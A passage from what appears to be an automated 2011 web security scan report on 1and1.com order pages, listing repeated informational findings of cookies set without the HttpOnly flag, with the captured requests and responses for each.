Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:52:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=651016b876a97400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/addon;jsessionid=AA64A8E9BE0F46BF3EB96366BA2FCD13.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.155. http://order.1and1.com/xml/order/costs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/costs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/costs HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:58 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=21b62dcc6185f000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/costs;jsessionid=F97987AC39B8E18D580FCDA0A43A753A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.156. http://order.1and1.com/xml/order/domaincheck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/domaincheck HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:31 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=74df2828c0bde800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/domaincheck;jsessionid=0C1C78F2B9E1ED296CC3F09976AC6E11.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.157. http://order.1and1.com/xml/order/domaincheck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.158. http://order.1and1.com/xml/order/eshopupselling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.159. http://order.1and1.com/xml/order/eshopupselling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/eshopupselling HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:38 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=77b06e36ce808c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/eshopupselling;jsessionid=E350E3F663E4617477BB706409508019.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.160. http://order.1and1.com/xml/order/popupDomainPrices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupDomainPrices HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2b1b8234745e6800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupDomainPrices;jsessionid=EECC1D398870904E1A403CED1277E5EB.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.161. http://order.1and1.com/xml/order/popupDomainPrices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.162. http://order.1and1.com/xml/order/popupGreenPower  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupGreenPower HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7e68c4801468a800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupGreenPower;jsessionid=144AB63B6FD2A635A5AAFA83DE86F409.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.163. http://order.1and1.com/xml/order/popupGreenPower  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=WZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:49:52 GMT; Path=/
ETag: 2a13611a8831339ff628b2e9f7c64b09
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19325


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.164. http://order.1and1.com/xml/order/popupPayPalInfo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupPayPalInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupPayPalInfo HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7a09ad3484127800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupPayPalInfo;jsessionid=B75E80D5C552A0BD8C969DE465F902C3.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.165. http://order.1and1.com/xml/order/popupServerOsCds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsCds

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupServerOsCds HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=226ab840267c5c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsCds;jsessionid=1AF14401B4F592D397D86232610BA605.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.166. http://order.1and1.com/xml/order/popupServerOsVps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsVps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupServerOsVps HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1c33f57f30826000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsVps;jsessionid=40FA96CB67E1FCB2006929EAF3F17218.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
